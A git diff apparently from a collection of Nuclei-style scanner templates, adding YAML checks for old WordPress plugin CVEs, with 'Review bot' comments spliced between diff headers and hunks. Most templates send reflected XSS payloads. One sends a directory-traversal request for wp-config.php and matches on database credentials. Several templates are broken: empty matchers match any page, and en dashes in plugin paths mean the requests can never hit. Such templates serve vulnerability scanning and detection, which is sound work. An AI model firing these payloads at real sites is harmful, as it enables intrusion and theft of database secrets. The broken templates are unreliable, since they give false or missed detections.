diff --git a/date.txt b/date.txt index eba8e1cb78..19047096d8 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20241124 +20241125 diff --git a/poc.txt b/poc.txt index dfd7739ee0..5bb1b30042 100644 --- a/poc.txt +++ b/poc.txt @@ -8918,6 +8918,7 @@ ./poc/cve/CVE-2011-4803.yaml ./poc/cve/CVE-2011-4804.yaml ./poc/cve/CVE-2011-4926-1779d9229b83a1399466ae14361bbefb.yaml +./poc/cve/CVE-2011-4926-2088.yaml ./poc/cve/CVE-2011-4926-2091.yaml ./poc/cve/CVE-2011-4926.yaml ./poc/cve/CVE-2011-4955-2c9bc7dc49f1d6049f053f437b9d7049.yaml @@ -9142,6 +9143,7 @@ ./poc/cve/CVE-2012-4272-be8ad5d2a33e00e145c6c6d44c6091d7.yaml ./poc/cve/CVE-2012-4272.yaml ./poc/cve/CVE-2012-4273-2194.yaml +./poc/cve/CVE-2012-4273-2198.yaml ./poc/cve/CVE-2012-4273-60f2c9c88ca63cf1daa993ad4a08d418.yaml ./poc/cve/CVE-2012-4273.yaml ./poc/cve/CVE-2012-4283-24608d891088820adef824dd0016f4fe.yaml @@ -9399,6 +9401,7 @@ ./poc/cve/CVE-2013-2251-8.yaml ./poc/cve/CVE-2013-2251-9.yaml ./poc/cve/CVE-2013-2251.yaml +./poc/cve/CVE-2013-2287-2243.yaml ./poc/cve/CVE-2013-2287-35fa1e30cd7c85480f6643f78205d60b.yaml ./poc/cve/CVE-2013-2287.yaml ./poc/cve/CVE-2013-2501-f5721b91d8780e1babce9661c23cb532.yaml @@ -9946,6 +9949,7 @@ ./poc/cve/CVE-2014-4548.yaml ./poc/cve/CVE-2014-4549-4415191f19cc09b59219e8dec440ebce.yaml ./poc/cve/CVE-2014-4549.yaml +./poc/cve/CVE-2014-4550-2366.yaml ./poc/cve/CVE-2014-4550-7c5b0f3fc5ba45d02029313feb89dfd7.yaml ./poc/cve/CVE-2014-4550.yaml ./poc/cve/CVE-2014-4551-fd5903aa8b5d2c8b2e658051772058fb.yaml @@ -9963,6 +9967,7 @@ ./poc/cve/CVE-2014-4557-c1cd3dc0f8c7505011ebb9ea3d2cab3a.yaml ./poc/cve/CVE-2014-4557.yaml ./poc/cve/CVE-2014-4558-2369.yaml +./poc/cve/CVE-2014-4558-2371.yaml ./poc/cve/CVE-2014-4558-b4acb8ab63209afc70dba18fa8c3e92f.yaml ./poc/cve/CVE-2014-4558.yaml ./poc/cve/CVE-2014-4559-9367e2b825cbd0bc30c4c1c6a5fee59b.yaml 
@@ -10295,6 +10300,7 @@ ./poc/cve/CVE-2014-8758.yaml ./poc/cve/CVE-2014-8799-2411.yaml ./poc/cve/CVE-2014-8799-2412.yaml +./poc/cve/CVE-2014-8799-2414.yaml ./poc/cve/CVE-2014-8799-28679161182c43e15921a9681ad9e065.yaml ./poc/cve/CVE-2014-8799.yaml ./poc/cve/CVE-2014-8800-e90fc4b3eb188635877b57fa907cc509.yaml @@ -10347,6 +10353,7 @@ ./poc/cve/CVE-2014-9038.yaml ./poc/cve/CVE-2014-9039-e36ead55dcc8029f1208afc5fd967940.yaml ./poc/cve/CVE-2014-9039.yaml +./poc/cve/CVE-2014-9094-2420.yaml ./poc/cve/CVE-2014-9094-33981699600bd7688fa76839ea64eb69.yaml ./poc/cve/CVE-2014-9094.yaml ./poc/cve/CVE-2014-9097-185f364a811c7ac717748c28afbba129.yaml @@ -10450,6 +10457,7 @@ ./poc/cve/CVE-2014-9442.yaml ./poc/cve/CVE-2014-9443-dce5b982688e425f6d11320686ce785d.yaml ./poc/cve/CVE-2014-9443.yaml +./poc/cve/CVE-2014-9444-2424.yaml ./poc/cve/CVE-2014-9444-70756cf68124cd9397587d06f0bb1382.yaml ./poc/cve/CVE-2014-9444.yaml ./poc/cve/CVE-2014-9453-ac9a7b71996c85009b2a2944312fb316.yaml @@ -10524,6 +10532,7 @@ ./poc/cve/CVE-2015-1000010.yaml ./poc/cve/CVE-2015-1000011-6ef8738040302a74ae4f4262e6a4cba3.yaml ./poc/cve/CVE-2015-1000011.yaml +./poc/cve/CVE-2015-1000012-2460.yaml ./poc/cve/CVE-2015-1000012-bd172eb0a5f5b4fee2b93533e1882477.yaml ./poc/cve/CVE-2015-1000012.yaml ./poc/cve/CVE-2015-1000013-c88ce724ce8bc15e25be894a573aacd0.yaml @@ -10835,6 +10844,7 @@ ./poc/cve/CVE-2015-4414-1b834b9e165140b4664cc5f2b49ee153.yaml ./poc/cve/CVE-2015-4414-2527.yaml ./poc/cve/CVE-2015-4414-2530.yaml +./poc/cve/CVE-2015-4414-2532.yaml ./poc/cve/CVE-2015-4414.yaml ./poc/cve/CVE-2015-4455-7d9a49758ec4a0e1bba306ea632621c1.yaml ./poc/cve/CVE-2015-4455.yaml @@ -10875,6 +10885,7 @@ ./poc/cve/CVE-2015-5308.yaml ./poc/cve/CVE-2015-5354.yaml ./poc/cve/CVE-2015-5461-2555.yaml +./poc/cve/CVE-2015-5461-2556.yaml ./poc/cve/CVE-2015-5461-635af6cd7a9be34e7f0bba5b4ee195e3.yaml ./poc/cve/CVE-2015-5461.yaml ./poc/cve/CVE-2015-5468-01b19b33d509430527fe10d5febf823f.yaml 
@@ -11401,6 +11412,7 @@ ./poc/cve/CVE-2015-9477.yaml ./poc/cve/CVE-2015-9479-610c1b0820a34b426f46a24294b86cf7.yaml ./poc/cve/CVE-2015-9479.yaml +./poc/cve/CVE-2015-9480-2630.yaml ./poc/cve/CVE-2015-9480-2632.yaml ./poc/cve/CVE-2015-9480-2633.yaml ./poc/cve/CVE-2015-9480-46b5d463ae28dd7308d897e49636d523.yaml @@ -11566,6 +11578,7 @@ ./poc/cve/CVE-2016-1000134-f4029376afda7fca93cc3ed29f8a800b.yaml ./poc/cve/CVE-2016-1000134.yaml ./poc/cve/CVE-2016-1000135-2683.yaml +./poc/cve/CVE-2016-1000135-2684.yaml ./poc/cve/CVE-2016-1000135-2685.yaml ./poc/cve/CVE-2016-1000135-953ff551adbc4893b237af8ca2f3090a.yaml ./poc/cve/CVE-2016-1000135.yaml @@ -11595,6 +11608,7 @@ ./poc/cve/CVE-2016-1000145-193dc216a6cfc62aea217a5dbfd96a13.yaml ./poc/cve/CVE-2016-1000145.yaml ./poc/cve/CVE-2016-1000146-266572fbe2cd7d8682ed9b6914e1f37d.yaml +./poc/cve/CVE-2016-1000146-2721.yaml ./poc/cve/CVE-2016-1000146.yaml ./poc/cve/CVE-2016-1000147-b5480a75c33424482b37a792f6029d2b.yaml ./poc/cve/CVE-2016-1000147.yaml @@ -11602,6 +11616,7 @@ ./poc/cve/CVE-2016-1000148-b06fb90961e87acbee5aeb0d78acee1a.yaml ./poc/cve/CVE-2016-1000148.yaml ./poc/cve/CVE-2016-1000149-2727.yaml +./poc/cve/CVE-2016-1000149-2728.yaml ./poc/cve/CVE-2016-1000149-c94391e68202ff41e65065899fd10200.yaml ./poc/cve/CVE-2016-1000149.yaml ./poc/cve/CVE-2016-1000150-39618c5c04a015f55cb99da607cb046a.yaml @@ -12290,6 +12305,7 @@ ./poc/cve/CVE-2017-16955-54b2c5bde330d2dc4614c1cb299f671b.yaml ./poc/cve/CVE-2017-16955.yaml ./poc/cve/CVE-2017-17043-08130ba3bd49cd34b98615982fe7f7a9.yaml +./poc/cve/CVE-2017-17043-2975.yaml ./poc/cve/CVE-2017-17043.yaml ./poc/cve/CVE-2017-17058.yaml ./poc/cve/CVE-2017-17059-2980.yaml @@ -12497,6 +12513,7 @@ ./poc/cve/CVE-2017-18534.yaml ./poc/cve/CVE-2017-18535-a6694da2ffada233390e8f1c5eb8b4ec.yaml ./poc/cve/CVE-2017-18535.yaml +./poc/cve/CVE-2017-18536-2993.yaml ./poc/cve/CVE-2017-18536-2995.yaml ./poc/cve/CVE-2017-18536-3cd05e19af62aad71cfdb87f03a9d489.yaml ./poc/cve/CVE-2017-18536.yaml 
@@ -13237,6 +13254,7 @@ ./poc/cve/CVE-2018-18019-b8803a49ed7728d2fbd8e6e96310ef1c.yaml ./poc/cve/CVE-2018-18019.yaml ./poc/cve/CVE-2018-18069-1a2e60d8b8511029783b8707140ec2ae.yaml +./poc/cve/CVE-2018-18069-3426.yaml ./poc/cve/CVE-2018-18069.yaml ./poc/cve/CVE-2018-18264 (copy 2).yaml ./poc/cve/CVE-2018-18264.yaml @@ -13452,6 +13470,7 @@ ./poc/cve/CVE-2018-3714.yaml ./poc/cve/CVE-2018-3760 2.yaml ./poc/cve/CVE-2018-3760.yaml +./poc/cve/CVE-2018-3810-3554.yaml ./poc/cve/CVE-2018-3810-3555.yaml ./poc/cve/CVE-2018-3810-6de071448d5adb9d4c6352281eb7005f.yaml ./poc/cve/CVE-2018-3810.yaml @@ -13622,6 +13641,7 @@ ./poc/cve/CVE-2018-7282.yaml ./poc/cve/CVE-2018-7314.yaml ./poc/cve/CVE-2018-7422-3594.yaml +./poc/cve/CVE-2018-7422-3595.yaml ./poc/cve/CVE-2018-7422-364c9e725b8200c8eda6850a76fb8265.yaml ./poc/cve/CVE-2018-7422.yaml ./poc/cve/CVE-2018-7433-1b1397ee1b9bed1e6459522b55fb6873.yaml @@ -13648,6 +13668,7 @@ ./poc/cve/CVE-2018-8711-1c1be366dda4b16c419a1b2f488fef83.yaml ./poc/cve/CVE-2018-8711.yaml ./poc/cve/CVE-2018-8715.yaml +./poc/cve/CVE-2018-8719-3640.yaml ./poc/cve/CVE-2018-8719-57c7d5d74ce266cc72c2eea523301fe2.yaml ./poc/cve/CVE-2018-8719.yaml ./poc/cve/CVE-2018-8727.yaml @@ -13662,6 +13683,7 @@ ./poc/cve/CVE-2018-9035-45611aeb7dd4380e1502ef5f2cbc7cd1.yaml ./poc/cve/CVE-2018-9035.yaml ./poc/cve/CVE-2018-9118-3651.yaml +./poc/cve/CVE-2018-9118-3654.yaml ./poc/cve/CVE-2018-9118-814871eb95f10c4230a142de91514698.yaml ./poc/cve/CVE-2018-9118.yaml ./poc/cve/CVE-2018-9126 (copy 2).yaml @@ -13885,6 +13907,7 @@ ./poc/cve/CVE-2019-14467-6f88be84c47348e27dc9d2b4c038fb82.yaml ./poc/cve/CVE-2019-14467.yaml ./poc/cve/CVE-2019-14470-3851.yaml +./poc/cve/CVE-2019-14470-3854.yaml ./poc/cve/CVE-2019-14470-3dc13a2b063ab16efc87bedddb70c896.yaml ./poc/cve/CVE-2019-14470.yaml ./poc/cve/CVE-2019-14530.yaml 
@@ -14152,6 +14175,7 @@ ./poc/cve/CVE-2019-15873-4b7862973219e898887e506d1d927ff2.yaml ./poc/cve/CVE-2019-15873.yaml ./poc/cve/CVE-2019-15889-3902.yaml +./poc/cve/CVE-2019-15889-3905.yaml ./poc/cve/CVE-2019-15889-805609e33a2b16f4cfd3fb9e1254d2ee.yaml ./poc/cve/CVE-2019-15889.yaml ./poc/cve/CVE-2019-15895-39cd0e7acf87f597851594983c8694c9.yaml @@ -14226,6 +14250,7 @@ ./poc/cve/CVE-2019-16523.yaml ./poc/cve/CVE-2019-16524-84cb9e4e90c3852a6688ba8b5396f562.yaml ./poc/cve/CVE-2019-16524.yaml +./poc/cve/CVE-2019-16525-3935.yaml ./poc/cve/CVE-2019-16525-3937.yaml ./poc/cve/CVE-2019-16525-5107e273cedaca507bc480c64fa321aa.yaml ./poc/cve/CVE-2019-16525.yaml @@ -14579,6 +14604,7 @@ ./poc/cve/CVE-2019-6340.yaml ./poc/cve/CVE-2019-6703-cfca9683c7d716d8ddd45ba519e7e7eb.yaml ./poc/cve/CVE-2019-6703.yaml +./poc/cve/CVE-2019-6715-4184.yaml ./poc/cve/CVE-2019-6715-4188.yaml ./poc/cve/CVE-2019-6715-b175b5b29c7b5153a9a4b1d22998677b.yaml ./poc/cve/CVE-2019-6715.yaml @@ -14895,6 +14921,7 @@ ./poc/cve/CVE-2020-13693-9f6548e1a65edc92b22b1e7e4aeb85a1.yaml ./poc/cve/CVE-2020-13693.yaml ./poc/cve/CVE-2020-13700-4508.yaml +./poc/cve/CVE-2020-13700-4510.yaml ./poc/cve/CVE-2020-13700-82316cdb4427a73e8b697e5d1cdfa14a.yaml ./poc/cve/CVE-2020-13700.yaml ./poc/cve/CVE-2020-13764-d4a7f0d1589667d32cbdcbb9bdf615de.yaml @@ -15001,6 +15028,7 @@ ./poc/cve/CVE-2020-16846.yaml ./poc/cve/CVE-2020-16920.yaml ./poc/cve/CVE-2020-16952.yaml +./poc/cve/CVE-2020-17362-4655.yaml ./poc/cve/CVE-2020-17362-4659.yaml ./poc/cve/CVE-2020-17362-b8d1258d5e487d3809196efa7cebb656.yaml ./poc/cve/CVE-2020-17362.yaml @@ -15111,6 +15139,7 @@ ./poc/cve/CVE-2020-24148.yaml ./poc/cve/CVE-2020-24149-f17b476af9729c706149033214bc1201.yaml ./poc/cve/CVE-2020-24149.yaml +./poc/cve/CVE-2020-24186-4794.yaml ./poc/cve/CVE-2020-24186-e802709dd363f61b6f07669be7eb580d.yaml ./poc/cve/CVE-2020-24186.yaml ./poc/cve/CVE-2020-24223 2.yaml 
@@ -15284,6 +15313,7 @@ ./poc/cve/CVE-2020-29304.yaml ./poc/cve/CVE-2020-29395-16ac2206026b33902232895de1707cd7.yaml ./poc/cve/CVE-2020-29395-5002.yaml +./poc/cve/CVE-2020-29395-5006.yaml ./poc/cve/CVE-2020-29395.yaml ./poc/cve/CVE-2020-29453 (copy 1).yaml ./poc/cve/CVE-2020-29453-1.yaml @@ -15817,6 +15847,7 @@ ./poc/cve/CVE-2020-9019-f0f978cf1482283f87c7ef8acdd7c45e.yaml ./poc/cve/CVE-2020-9019.yaml ./poc/cve/CVE-2020-9036.yaml +./poc/cve/CVE-2020-9043(1).yaml ./poc/cve/CVE-2020-9043-71853e1d2641cd1f7430c643c9db64bd.yaml ./poc/cve/CVE-2020-9043.yaml ./poc/cve/CVE-2020-9047.yaml @@ -16174,6 +16205,7 @@ ./poc/cve/CVE-2021-24209-a6ed914616e6d20250ae103154cdd5f3.yaml ./poc/cve/CVE-2021-24209.yaml ./poc/cve/CVE-2021-24210-3057223241f22f26c976b13abf36d9b1.yaml +./poc/cve/CVE-2021-24210-5640.yaml ./poc/cve/CVE-2021-24210.yaml ./poc/cve/CVE-2021-24211-ed3d8c37e9725aabcf188699a130ab05.yaml ./poc/cve/CVE-2021-24211.yaml @@ -16351,6 +16383,7 @@ ./poc/cve/CVE-2021-24289.yaml ./poc/cve/CVE-2021-24290-e8fd43664cd0b029c9c174584ea48e8d.yaml ./poc/cve/CVE-2021-24290.yaml +./poc/cve/CVE-2021-24291-5683.yaml ./poc/cve/CVE-2021-24291-eefec2c5385df5bdf65949b7b59e5ce1.yaml ./poc/cve/CVE-2021-24291.yaml ./poc/cve/CVE-2021-24292-9aed2fbe384cc85f25bd56e5ae692669.yaml @@ -16404,6 +16437,7 @@ ./poc/cve/CVE-2021-24315-47848231844c1b4bbef5562929c4aefc.yaml ./poc/cve/CVE-2021-24315.yaml ./poc/cve/CVE-2021-24316-2813a1d60b58f7217403cc4e686b51f8.yaml +./poc/cve/CVE-2021-24316-5691.yaml ./poc/cve/CVE-2021-24316-d168751b238f28a1a68263abeb6f4c7a.yaml ./poc/cve/CVE-2021-24316.yaml ./poc/cve/CVE-2021-24317-dfd9bd55d8a4d4cc599169686f7f08ba.yaml @@ -16553,6 +16587,7 @@ ./poc/cve/CVE-2021-24386.yaml ./poc/cve/CVE-2021-24387-46cf78e6de50515d5a8ff1b6a59818c9.yaml ./poc/cve/CVE-2021-24387-5722.yaml +./poc/cve/CVE-2021-24387-5724.yaml ./poc/cve/CVE-2021-24387.yaml ./poc/cve/CVE-2021-24388-14614859113ffb7afd9ac82859c04eb2.yaml ./poc/cve/CVE-2021-24388.yaml 
@@ -16593,6 +16628,7 @@ ./poc/cve/CVE-2021-24405-6c00b40f33737e8c3cb00795fd2348c7.yaml ./poc/cve/CVE-2021-24405.yaml ./poc/cve/CVE-2021-24406-5734.yaml +./poc/cve/CVE-2021-24406-5736.yaml ./poc/cve/CVE-2021-24406-de317cf69ce111059aaeb0832a7f4981.yaml ./poc/cve/CVE-2021-24406.yaml ./poc/cve/CVE-2021-24407-21ab28420b696cd20235651481057cca.yaml @@ -16751,6 +16787,7 @@ ./poc/cve/CVE-2021-24486.yaml ./poc/cve/CVE-2021-24487-179b005e9af084eab7ca073477549619.yaml ./poc/cve/CVE-2021-24487.yaml +./poc/cve/CVE-2021-24488(1).yaml ./poc/cve/CVE-2021-24488-75b39b08cbf876cfb9e54e815d6a31c8.yaml ./poc/cve/CVE-2021-24488.yaml ./poc/cve/CVE-2021-24489-5f15d3969b9b6929e23eb2161431da8d.yaml @@ -17767,6 +17804,7 @@ ./poc/cve/CVE-2021-24995.yaml ./poc/cve/CVE-2021-24996-4d762948c0db5f612fe71d57da2478b3.yaml ./poc/cve/CVE-2021-24996.yaml +./poc/cve/CVE-2021-24997-5782.yaml ./poc/cve/CVE-2021-24997-aff35f57b7fc2809431dfbd3d3bb6272.yaml ./poc/cve/CVE-2021-24997.yaml ./poc/cve/CVE-2021-24998-6a0e16d4236b7def46eb49989ac48b25.yaml @@ -17832,6 +17870,7 @@ ./poc/cve/CVE-2021-25027.yaml ./poc/cve/CVE-2021-25028-5783.yaml ./poc/cve/CVE-2021-25028-5784.yaml +./poc/cve/CVE-2021-25028-5787.yaml ./poc/cve/CVE-2021-25028-6a7346a0d71f3758c4e4d202e954f662.yaml ./poc/cve/CVE-2021-25028.yaml ./poc/cve/CVE-2021-25029-999aea7e010ac04d41f94a121a38cc3f.yaml @@ -18657,6 +18696,7 @@ ./poc/cve/CVE-2021-39311-014c83de95dae039463389351163fcd0.yaml ./poc/cve/CVE-2021-39311.yaml ./poc/cve/CVE-2021-39312-30532d01e391162b738127d965c72c50.yaml +./poc/cve/CVE-2021-39312-6327.yaml ./poc/cve/CVE-2021-39312.yaml ./poc/cve/CVE-2021-39313-ca85c142f0fa3daec9e192abeaf739f6.yaml ./poc/cve/CVE-2021-39313.yaml 
@@ -19505,6 +19545,7 @@
 ./poc/cve/CVE-2022-0649.yaml
 ./poc/cve/CVE-2022-0651-c9e40242ef33288cd1a708c183c7cada.yaml
 ./poc/cve/CVE-2022-0651.yaml
+./poc/cve/CVE-2022-0653-6638.yaml
 ./poc/cve/CVE-2022-0653-e0fe444c64b63bc8f08028392ceeb0d0.yaml
 ./poc/cve/CVE-2022-0653.yaml
 ./poc/cve/CVE-2022-0656-994a2cef063389fd91a0a80146d87f09.yaml
@@ -21042,6 +21083,7 @@
 ./poc/cve/CVE-2022-27848-6f237bcdcde0f1e74372ab90414040ae.yaml
 ./poc/cve/CVE-2022-27848.yaml
 ./poc/cve/CVE-2022-27849-506fab136540118868e933f9f2f59b67.yaml
+./poc/cve/CVE-2022-27849-6740.yaml
 ./poc/cve/CVE-2022-27849.yaml
 ./poc/cve/CVE-2022-27850-9949dde1f4f7636a2e09e262eec95ce4.yaml
 ./poc/cve/CVE-2022-27850.yaml
diff --git a/poc/cve/CVE-2011-4926-2088.yaml b/poc/cve/CVE-2011-4926-2088.yaml
new file mode 100644
index 0000000000..bbefdb8002
--- /dev/null
+++ b/poc/cve/CVE-2011-4926-2088.yaml
@@ -0,0 +1,30 @@
+id: CVE-2011-4926
+
+info:
+ name: Adminimize 1.7.22 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Cross-site scripting (XSS) vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4926
+ tags: cve,cve2011,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/CVE-2012-4273-2198.yaml b/poc/cve/CVE-2012-4273-2198.yaml
new file mode 100644
index 0000000000..bacae8d717
--- /dev/null
+++ b/poc/cve/CVE-2012-4273-2198.yaml
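Review bot: The body matcher in CVE-2011-4926-2088.yaml carries a single empty word, `- ""`, which every response satisfies, so together with the `text/html` and `200` matchers the template flags any HTML page on the target as vulnerable. Presumably the reflected payload was lost when this listing was produced, but as committed the match proves nothing about reflection of the `page=` parameter. The word should be the decoded form of exactly what the request sends, e.g. `- "</script><script>alert(document.domain)</script>"`, so that a hit requires the injected string to come back unescaped.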
@@ -0,0 +1,30 @@
+id: CVE-2012-4273
+
+info:
+ name: 2 Click Socialmedia Buttons < 0.34 - Reflected Cross Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Cross-site scripting (XSS) vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4273
+
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/CVE-2013-2287-2243.yaml b/poc/cve/CVE-2013-2287-2243.yaml
new file mode 100644
index 0000000000..53312074c8
--- /dev/null
+++ b/poc/cve/CVE-2013-2287-2243.yaml
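Review bot: The `info` block of CVE-2012-4273-2198.yaml ends in a blank line where the neighbouring templates carry a `tags:` entry, so this template is skipped by any tag-driven run (`-tags wordpress`, `-tags cve2012`) and is inconsistent with the rest of the batch; add `tags: cve,cve2012,wordpress,xss,wp-plugin`. The body matcher also lists only the empty word `- ""`, which matches every response, so the template as committed will report any HTML 200 page rather than a reflection of `xing-url`; the word should be the decoded payload the request sends.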
@@ -0,0 +1,37 @@
+id: CVE-2013-2287
+
+info:
+ name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting
+ author: daffainfo
+ severity: medium
+ description: Multiple cross-site scripting vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2013-2287
+ - https://www.dognaedis.com/vulns/DGS-SEC-16.html
+ - http://osvdb.org/90840
+ classification:
+ cve-id: CVE-2013-2287
+ tags: cve,cve2013,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/21
diff --git a/poc/cve/CVE-2014-4550-2366.yaml b/poc/cve/CVE-2014-4550-2366.yaml
new file mode 100644
index 0000000000..b632ab76ac
--- /dev/null
+++ b/poc/cve/CVE-2014-4550-2366.yaml
@@ -0,0 +1,37 @@
+id: CVE-2014-4550
+
+info:
+ name: Shortcode Ninja <= 1.4 - Unauthenticated Reflected XSS
+ author: daffainfo
+ severity: medium
+ reference: |
+ - https://wpscan.com/vulnerability/c7c24c7d-5341-43a6-abea-4a50fce9aab0
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-4550
+
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2014-4550
+ cwe-id: CWE-79
+ description: "Cross-site scripting (XSS) vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter."
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/shortcode–ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "'>"
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/poc/cve/CVE-2014-4558-2371.yaml b/poc/cve/CVE-2014-4558-2371.yaml
new file mode 100644
index 0000000000..504a98db1e
--- /dev/null
+++ b/poc/cve/CVE-2014-4558-2371.yaml
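Review bot: The request path in CVE-2014-4550-2366.yaml spells the plugin directory as `shortcode–ninja` with a Unicode en dash (U+2013) rather than an ASCII hyphen, so the GET goes to a directory that does not exist on any WordPress install and the template can only ever miss; the line should read `- "{{BaseURL}}/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"`. Separately, `reference: |` turns the two list items into one literal string instead of a YAML list, unlike the other templates in this batch, and the `info` block has no `tags:` entry. The body word `'>` is also weak on its own, since any page that contains an attribute closing followed by a tag end matches; the full reflected `'><script>alert(document.domain)</script>` would be the safer word.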
@@ -0,0 +1,37 @@
+id: CVE-2014-4558
+
+info:
+ name: WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected XSS
+ author: daffainfo
+ severity: medium
+ reference: |
+ - https://wpscan.com/vulnerability/37d7936a-165f-4c37-84a6-7ba5b59a0301
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-4558
+
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2014-4558
+ cwe-id: CWE-79
+ description: "Cross-site scripting (XSS) vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter."
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/swipehq–payment–gateway–woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "'>"
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/CVE-2014-8799-2414.yaml b/poc/cve/CVE-2014-8799-2414.yaml
new file mode 100644
index 0000000000..2fff64b065
--- /dev/null
+++ b/poc/cve/CVE-2014-8799-2414.yaml
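Review bot: The plugin slug in the CVE-2014-4558-2371.yaml path, `swipehq–payment–gateway–woocommerce`, uses three Unicode en dashes instead of ASCII hyphens, so the request targets a non-existent directory and the template cannot detect the vulnerable plugin; the path also ends with a stray space inside the quotes after `%3C/script%3E`, which presumably gets sent as part of the URL. The line should be `- "{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E"`. As in the sibling Shortcode Ninja template, `reference: |` makes the references a literal string rather than a list, and `tags:` is missing from `info`.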
@@ -0,0 +1,31 @@
+id: CVE-2014-8799
+
+info:
+ name: WordPress Plugin DukaPress 2.5.2 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.
+ reference:
+ - https://www.exploit-db.com/exploits/35346
+ - https://www.cvedetails.com/cve/CVE-2014-8799
+ tags: cve,cve2014,wordpress,wp-plugin,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "DB_NAME"
+ - "DB_PASSWORD"
+ - "DB_USER"
+ - "DB_HOST"
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/CVE-2014-9094-2420.yaml b/poc/cve/CVE-2014-9094-2420.yaml
new file mode 100644
index 0000000000..e825e9eb53
--- /dev/null
+++ b/poc/cve/CVE-2014-9094-2420.yaml
@@ -0,0 +1,29 @@
+id: CVE-2014-9094
+
+info:
+ name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting
+ author: daffainfo
+ severity: medium
+ description: "Multiple cross-site scripting (XSS) vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter."
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
+
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
